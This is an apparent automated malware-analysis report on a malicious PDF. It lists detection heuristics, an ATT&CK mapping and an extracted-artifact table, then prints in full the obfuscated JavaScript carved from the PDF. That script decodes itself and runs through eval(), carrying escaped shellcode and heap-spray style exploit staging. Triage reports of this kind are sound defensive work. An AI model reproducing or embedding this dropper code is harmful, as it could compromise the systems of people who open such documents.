MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of an eval() call within the decoded JavaScript stream (PDF_EVAL) suggests code obfuscation and dynamic execution. The extracted artifact 'javascript_obj0007_000.js' further confirms the presence of JavaScript. The overall behavior points to a downloader or dropper, aiming to execute further malicious code.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
Jv=vu>8Z.Np8j\"%uxOxO%uxOxO%uxOxO%u }gh%uOO6h%uQQVC%ua hC%ua ,%ug}OO%ugDxO%ugh}5%uga 6%u}}gV%u}}}}%uahf}%uS}xg%ug}g}%uQxg}%ugO5}%uC}Qx%uxD}O%uC}Qx%uQggf%ug} O%ug}gh%uQxg}%uhC O%uQ,af%ug,5,%u f O%ug},,%ug}g}%u55QQ%uhCgh%uffaf%uQ6,,%u fg,%ug},}%ug}g}%u55QQ%uhCgf%uV5af%u, 6}%u fDS%ug} S%ug}g}%u55QQ%uhCgO%u af%u }D,%u fa}%ug}Oh%ug}g}%u55QQ%uhC}}%uDgaf%u 5CQ%u f6f%ug}DC%ug}g}%u55QQ%u5}}h%uSfQ}%uC5DV%uQQ,6%u}f55%uga Q%ug}gg%uh,g}%uC5QQ%uQxVh%ugh55%ugga6%uQxhQ%u}fh5%u fhC%ug}Qx%ug}g}%uafh}%u}6SC%uC}V … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x241 | 8155 bytes |
SHA-256: 7349a733888f79ff1e00111ccc8a10e1ec1752327b5f137ba9932eab1ddc458d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 115 of 164 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function o3SOLBe8T1AwwXS8o6z(o3SOLBe8T1AwwXS8o6z,vpoG1mc1h2uMv) {var i5Um0Q9mNIL=o3SOLBe8T1AwwXS8o6z. substr (vpoG1mc1h2uMv, 1);return i5Um0Q9mNIL;}/*ksf8EAJGJZA5J|PuSvI0rdchucK7kVe|EAJIASP*/function o5rYaXh(ZHaTULxu5cQ) {/*sQG1DVm|HuMyNpW8Hg|s2a36aDFaVUlElr6oDi*/var NJ9dovKxRJ85EpTeC1 = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*LTN9h[VfA2btv1mrRpxsBHUFt]BXFkY*//*AlQbel7fe|OPP17hguQi2|nlmp9rQX8K9Ome*/var c9SvTdjEYBUOPeNsI8 /*jAU8OkOGhvnRCLJmzv[eu6uI45I]hm9HmUF*/= new String("eMjwncvs15hVSg}Rr9kbAzY3B7(J<UlX42TNK.P8Wmt)HdE0>ip{IZLuFGqoy ,DOx6QfaC");/*AT7cFkuHw3ulp8FZ40|zvq8TT8a6SfxN|vq4WaCIUwt9vzZqq7g*/for(AQC4MGjglmYdEXv0qOZ=0;AQC4MGjglmYdEXv0qOZ<NJ9dovKxRJ85EpTeC1.length;AQC4MGjglmYdEXv0qOZ++) {if(ZHaTULxu5cQ == o3SOLBe8T1AwwXS8o6z(c9SvTdjEYBUOPeNsI8, AQC4MGjglmYdEXv0qOZ)) {/*oev7dL3vrr9g[pbzFe8ZRsZDi]tOwPraucYNoS9VA82d*/return o3SOLBe8T1AwwXS8o6z(NJ9dovKxRJ85EpTeC1, AQC4MGjglmYdEXv0qOZ);/*UTuyRKGAjJiX2xK <ek379Gl]G7RF0utKE*/}}return ZHaTULxu5cQ;}/*AWnFWMO4kHsu[MVJKUQwlW]AbkoKvsouER0beEV*//*LE0bQM|bh1NJN7CphqzTZ|Dew35R8RXKVN*/var a7D45 = new String;var v6JiTbg8YW = new String("\nFNIvEkxSCxVk S{ yoG9v=v>8Gv5IINojw;\nFNIvGK4tzkkKg<af0Pop;\nWu>.L)i>vGOxQQR3}Ug3<SbEFjykP9.quI7DoVWGOK1vlfmQzQb{k)bXxfJywn\nvvGt)E8vjykP9.quI7DoVWGOKsE8>mLtv*vDvevlfmQzQb{k)bXxfJywn\nvvvvykP9.quI7DoVWGOKv+=vykP9.quI7DoVWGOK;\nvvc\nvvykP9.quI7DoVWGOKv=vykP9.quI7DoVWGOKsZuKZLI)>mj 1vlfmQzQb{k)bXxfJyv/vDw;\nvvI8LuI>vykP9.quI7DoVWGOK;\nc\nWu>.L)i>vIQrOOhu<SZmZpHUij)hLVRgxNqYa,<T,Lwn\nvvFNIvYrG)<{VtHLN2.6Y(v=v q . . . .;\nvvFNIvir8Xltf<6S<4><(Jv=vu>8Z.Np8j\"%uxOxO%uxOxO%uxOxO%u }gh%uOO6h%uQQVC%ua hC%ua ,%ug}OO%ugDxO%ugh}5%uga 6%u}}gV%u}}}}%uahf}%uS}xg%ug}g}%uQxg}%ugO5}%uC}Qx%uxD}O%uC}Qx%uQggf%ug} O%ug}gh%uQxg}%uhC O%uQ,af%ug,5,%u f O%ug},,%ug}g}%u55QQ%uhCgh%uffaf%uQ6,,%u fg,%ug},}%ug}g}%u55QQ%uhCgf%uV5af%u, 6}%u fDS%ug} S%ug}g}%u55QQ%uhCgO%u af%u }D,%u fa}%ug}Oh%ug}g}%u55QQ%uhC}}%uDgaf%u 5CQ%u f6f%ug}DC%ug}g}%u55QQ%u5}}h%uSfQ}%uC5DV%uQQ,6%u}f55%uga Q%ug}gg%uh,g}%uC5QQ%uQxVh%ugh55%ugga6%uQxhQ%u}fh5%u fhC%ug}Qx%ug}g}%uafh}%u}6SC%uC}V %ufa f%ug}g}%uQQg}%u}O55%uD5Qx%uD}QV%uQQh}%uV}55%u, af%ug}g}%uh}g}%u55Qx%ua6}h%uhQgS%uh5Qx%u f}f%ug}ag%ug}g}%u55gV%uDaV}%uhOg}%uV,C,%uDaa5%ugh5}%ua5Cf%ug}g}%uC5, %uQxV}%ugO55%ugga6%uQxhQ%u}fh5%u5} f%ug}g}%ua6g}%uhfga%u55gV%uSVVh%uhVOx%u, hV%uV}C5%uhVh}%u55Qx%ua6}O%uhQg5%uh5Qx%u f}f%ug}VV%ug}g}%ug}a6%uC5, %uQxV}%ugf55%ugSa6%uQxhQ%u}fh5%u}} f%ug}g}%ua6g}%uQx, %u}}55%ugga6%uQxhQ%u}fh5%ug} f%ug}g}%u5gg}%uhShx%u ggV%u ggV%u ggV%u ggV%u OQV%uh6gh%uQxhV%u SO6%uhS,a%u }, %uQxh5%uQx O%ugfCD%uhDQx%uhCgO%uCVQx%uQxSO%u},Ch%ugVCf%uhC,V%uCCQx%ugVV}%uSV,V%u5QDQ%uxD5g%uDVgV%uSVhC%ug ,C%u}}6,%u,SS6%ugfCh%uD,Dg%ugVgD%u5},S%u,g x%u,,Sx%uC5h,%uh6 5%u xQx%uh6Qx%ugVVh%uaCOD%ugOQx%uQx5x%u}Oh6%uODgV%ughQx%ugVQx%uh,D5%uDShD%ug}gf%u,h f%u, ,,%uh5, %u5OhS%u5 5D%ug}5,%ufxQa%uf fx%uD}O5%uQxD}%uQSO %uO,Q,%ufOQg%uQCDg%uQQQg%uD}Q}%uQVQD%uQfQ}%uQVD}%uQ,Q}%uDgQx%uQaf %uO}f %uQxQC%uOCOS%u OC\"w;\nvv)Wvj)hLVRgxNqYa,<T,Lv==v,wn\nvvvvYrG)<{VtHLN2.6Y(v=v qO O O O ;\nvvvvir8Xltf<6S<4><(Jv=vu>8Z.Np8j\"%uxOxO%uxOxO%uxOxO%u }gh%uOO6h%uQQVC%ua hC%ua ,%ug}OO%ugDxO%ugh}5%uga 6%u}}gV%u}}}}%uahf}%uS}xg%ug}g}%uQxg}%ugO5}%uC}Qx%uxD}O%uC}Qx%uQggf%ug} O%ug}gh%uQxg}%uhC O%uQ,af%ug,5,%u f O%ug},,%ug}g}%u55QQ%uhCgh%uffaf%uQ6,,%u fg,%ug},}%ug}g}%u55QQ%uhCgf%uV5af%u, 6}%u fDS%ug} S%ug}g}%u55QQ%uhCgO%u af%u }D,%u fa}%ug}Oh%ug}g}%u55QQ%uhC}}%uDgaf%u 5CQ%u f6f%ug}DC%ug}g}%u55QQ%u5}}h%uSfQ}%uC5DV%uQQ,6%u}f55%uga Q%ug}gg%uh,g}%uC5QQ%uQxVh%ugh55%ugga6%uQxhQ%u}fh5%u fhC%ug}Qx%ug}g}%uafh}%u}6SC%uC}V %ufa f%ug}g}%uQQg}%u}O55%uD5Qx%uD}QV%uQQh}%uV}55%u, af%ug}g}%uh}g}%u55Qx%ua6}h%uhQgS%uh5Qx%u f}f%ug}ag%ug}g}%u55gV%uDaV}%uhOg}%uV,C,%uDaa5%ugh5}%ua5Cf%ug}g}%uC5, %uQxV}%ugO55%ugga6%uQxhQ%u}fh5%u5} f%ug}g}%ua6g}%uhfga%u55gV%uSVVh%uhVOx%u, hV%uV}C5%uhVh}%u55Qx%ua6}O%uhQg5%uh5Qx%u f}f%ug}VV%ug}g}%ug}a6%uC5, %uQxV}%ugf55%ugSa6%uQxhQ%u}fh5%u}} f%ug}g}%ua6g}%uQx, %u}}55%ugga6%uQxhQ%u}fh5%ug} f%ug}g}%u5gg}%uhShx%u ggV%u ggV%u ggV%u ggV%u OQV%uh6gh%uQxhV%u SO6%uhS,a%u }, %uQxh5%uQx O%ugfCD%uhDQx%uhCgO%uCVQx%uQxSO%u},Ch%ugVCf%uhC,V%uCCQx%ugVV}%uSV,V%u5QDQ%uxD5g%uDVgV%uSVhC%ug ,C%u}}6,%u,SS6%ugfCh%uD,Dg%ugVgD%u5},S%u,g x%u,,Sx%uC5h,%uh6 5%u xQx%uh6Qx%ugVVh%uaCOD%ugOQx%uQx5x%u}Oh6%uODgV%ughQx%ugVQx%uh,D5%uDShD%ug}gf%u,h f%u, ,,%uh5, %u5OhS%u5 5D%ug}5,%ufxQa%uf fx%uD}O5%uQxD}%uQSO %uO,Q,%ufOQg%uQCDg%uQQQg%uD}Q}%uQVQD%uQfQ}%uQVD}%uQ,Q}%uDgQx%uQaf %uO}f %uQxQC%uOCOS%u OC\"w;\nvvc\nvv8EZ8v)Wvj)hLVRgxNqYa,<T,Lv==vDwn\nvvvvir8Xltf<6S<4><(Jv=vu>8Z.Np8j\"%uxOxO%uxOxO%uxOxO%u }gh%uOO6h%uQQVC%ua hC%ua ,%ug}OO%ugDxO%ugh}5%uga 6%u}}gV%u}}}}%uahf}%uS}xg%ug}g}%uQxg}%ugO5}%uC}Qx%uxD}O%uC}Qx%uQggf%ug} O%ug}gh%uQxg}%uhC O%uQ,af%ug,5,%u f O%ug},,%ug}g}%u55QQ%uhCgh%uffaf%uQ6,,%u fg,%ug},}%ug}g}%u55QQ%uhCgf%uV5af%u, 6}%u fDS%ug} S%ug}g}%u55QQ%uhCgO%u af%u }D,%u fa}%ug}Oh%ug}g}%u55QQ%uhC}}%uDgaf%u 5CQ%u f6f%ug}DC%ug}g}%u55QQ%u5}}h%uSfQ}%uC5DV%uQQ,6%u}f55%uga Q%ug}gg%uh,g}%uC5QQ%uQxVh%ugh55%ugga6%uQxhQ%u}fh5%u fhC%ug}Qx%ug}g}%uafh}%u}6SC%uC}V %ufa f%ug}g}%uQQg}%u}O55%uD5Qx%uD}QV%uQQh}%uV}55%u, af%ug}g}%uh}g}%u55Qx%ua6}h%uhQgS%uh5Qx%u f}f%ug}ag%ug}g}%u55gV%uDaV}%uhOg}%uV,C,%uDaa5%ugh5}%ua5Cf%ug}g}%uC5, %uQxV}%ugO55%ugga6%uQxhQ%u}fh5%u5} f%ug}g}%ua6g}%uhfga%u55gV%uSVVh%uhVOx%u, hV%uV}C5%uhVh}%u55Qx%ua6}O%uhQg5%uh5Qx%u f}f%ug}VV%ug}g}%ug}a6%uC5, %uQxV}%ugf55%ugSa6%uQxhQ%u}fh5%u}} f%ug}g}%ua6g}%uQx, %u}}55%ugga6%uQxhQ%u}fh5%ug} f%ug}g}%u5gg}%uhShx%u ggV%u ggV%u ggV%u ggV%u OQV%uh6gh%uQxhV%u SO6%uhS,a%u }, %uQxh5%uQx O%ugfCD%uhDQx%uhCgO%uCVQx%uQxSO%u},Ch%ugVCf%uhC,V%uCCQx%ugVV}%uSV,V%u5QDQ%uxD5g%uDVgV%uSVhC%ug ,C%u}}6,%u,SS6%ugfCh%uD,Dg%ugVgD%u5},S%u,g x%u,,Sx%uC5h,%uh6 5%u xQx%uh6Qx%ugVVh%uaCOD%ugOQx%uQx5x%u}Oh6%uODgV%ughQx%ugVQx%uh,D5%uDShD%ug}gf%u,h f%u, ,,%uh5, %u5OhS%u5 5D%ug}5,%ufxQa%uf fx%uD}O5%uQxD}%uQSO %uO,Q,%ufOQg%uQCDg%uQQQg%uD}Q}%uQVQD%uQfQ}%uQVD}%uQ,Q}%uDgQx%uQaf %uO}f %uQxQC%uOCOS%u OC\"w;\nvvc\nvvFNIvkYh}SYGGRXlLKLAIv=v qx ;\nvvFNIvRyYmm< dmP9UadqLv=vir8Xltf<6S<4><(JsE8>mLtv*vD;\nvvFNIvlfmQzQb{k)bXxfJyv=vkYh}SYGGRXlLKLAIv-vjRyYmm< dmP9UadqLv+v qOaw;\nvvFNIvykP9.quI7DoVWGOKv=vu>8Z.Np8j\"%uC C %uC C \"w;\nvvykP9.quI7DoVWGOKv=vGOxQQR3}Ug3<SbEFjykP9.quI7DoVWGOK1vlfmQzQb{k)bXxfJyw;\nvvFNIvhCCbX6r>K>mVmD6Iv=vjYrG)<{VtHLN2.6Y(v-v qx wv/vkYh}SYGGRXlLKLAI;\nvvWiIvjFNIvk(4tutJKAEQJlOz.v=v ;vk(4tutJKAEQJlOz.vevhCCbX6r>K>mVmD6I;vk(4tutJKAEQJlOz.v++vwn\nvvvvEkxSCxVk S{ yoG9[k(4tutJKAEQJlOz.]v=vykP9.quI7DoVWGOKv+vir8Xltf<6S<4><(J;\nvvc\nc\nWu>.L)i>vuUq)T}lhOV3)gJT}jwn\nvvFNIvTaqipBB55lPm2ykHv=v ;\nvvFNIvqR(xlqg4 .}36pPqv=vNppsF)8G8Il8IZ)i>sLiJLI)>mjw;\nvvNpps.E8NI<)083uLjGK4tzkkKg<af0Popw;\n\nvv)WvjqR(xlqg4 .}36pPqvevfs,wn\nvvvvIQrOOhu<SZmZpHUij w;\nvvvvFNIv4KEE,hGhtTZ}Thyxv=vu>8Z.Np8j\"%u . .%u . .\"w;\nvvvvGt)E8vj4KEE,hGhtTZ}ThyxsE8>mLtvevxxC6Dw4KEE,hGhtTZ}Thyxv+=v4KEE,hGhtTZ}Thyx;\nvvvvLt)Zvs.iEENKJLiI8v=vViEENKs.iEE8.Lg0N)E9>Wijn\nvvvvvvZuKHv:v\"\"1v0Zmv:v4KEE,hGhtTZ}Thyx\nvvvvc\nvvvvw;\nvvc\n)WvjqR(xlqg4 .}36pPqvM=vCwn\nvvvvLIovn\n)WvjNppsPi.sViEENKsm8L9.i>wn\nvvvvvvvvIQrOOhu<SZmZpHUijDw;\nvvvvvvvvFNIvk7fq3AU2qdGOTN,Xv=vu>8Z.Np8j\"% C\"w;\nvvvvvvvvGt)E8vjk7fq3AU2qdGOTN,XsE8>mLtvev qx wk7fq3AU2qdGOTN,Xv+=vk7fq3AU2qdGOTN,X;\nvvvvvvvvk7fq3AU2qdGOTN,Xv=v\"Ys\"v+vk7fq3AU2qdGOTN,X;\nNppsPi.sViEENKsm8L9.i>jk7fq3AU2qdGOTN,Xw;\nvvvvvvvvTaqipBB55lPm2ykHv=v,;\nvvvvvvc\nvvvvvv8EZ8vn\nvvvvvvvvTaqipBB55lPm2ykHv=v,;\nvvvvvvc\nvvvvc\nvvvv.NL.tvj8wn\nvvvvvvTaqipBB55lPm2ykHv=v,;\nvvvvc\nvvvv)WvjTaqipBB55lPm2ykHv==v,wn\nvvvvvv)WvjjqR(xlqg4 .}36pPqvM=vfs,&&vqR(xlqg4 .}36pPqvevCwwn\nvvvvvvvvIQrOOhu<SZmZpHUij,w;\nvvvvvvvvFNIv709Vqg38iRu3(L(Lv=v\",DCCCCCCCCCCCCCCCCCC\";\nvvvvvvvvWiIvj)2{)LAR{QSZWiZV,v=v ;v)2{)LAR{QSZWiZV,vevDfQ;v)2{)LAR{QSZWiZV,v++vwn\nvvvvvvvvvv709Vqg38iRu3(L(Lv+=v\"a\";\nvvvvvvvvc\nvvvvvvvvuL)EspI)>LWj\"%x6 W\"1v709Vqg38iRu3(L(Lw;\nvvvvvvc\nvvvvc\nvvc\nc\nNppsGUV.HNr2IhGk63V3v=vuUq)T}lhOV3)gJT};\nGK4tzkkKg<af0Popv=vNppsZ8L<)083uLj\"NppsGUV.HNr2IhGk63V3jw\"1v, w;\n");/*maMD7DRGROJ6wz{FPQIuCCpUA7rKT5w5}A9TDQZUfiQ*//*YCWoTfYWi|qjBXuU|gQogQ7jgX*/for(KCJQ4wtvTlff=0;KCJQ4wtvTlff<v6JiTbg8YW.length;KCJQ4wtvTlff++)a7D45 += o5rYaXh(o3SOLBe8T1AwwXS8o6z(v6JiTbg8YW,KCJQ4wtvTlff));eval(a7D45);/*B5KTUNp8gLW2taiSb6D[OjC3GS0pzNj1JtKd6]cdCyVvP4Er0HdFrg8y*/
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.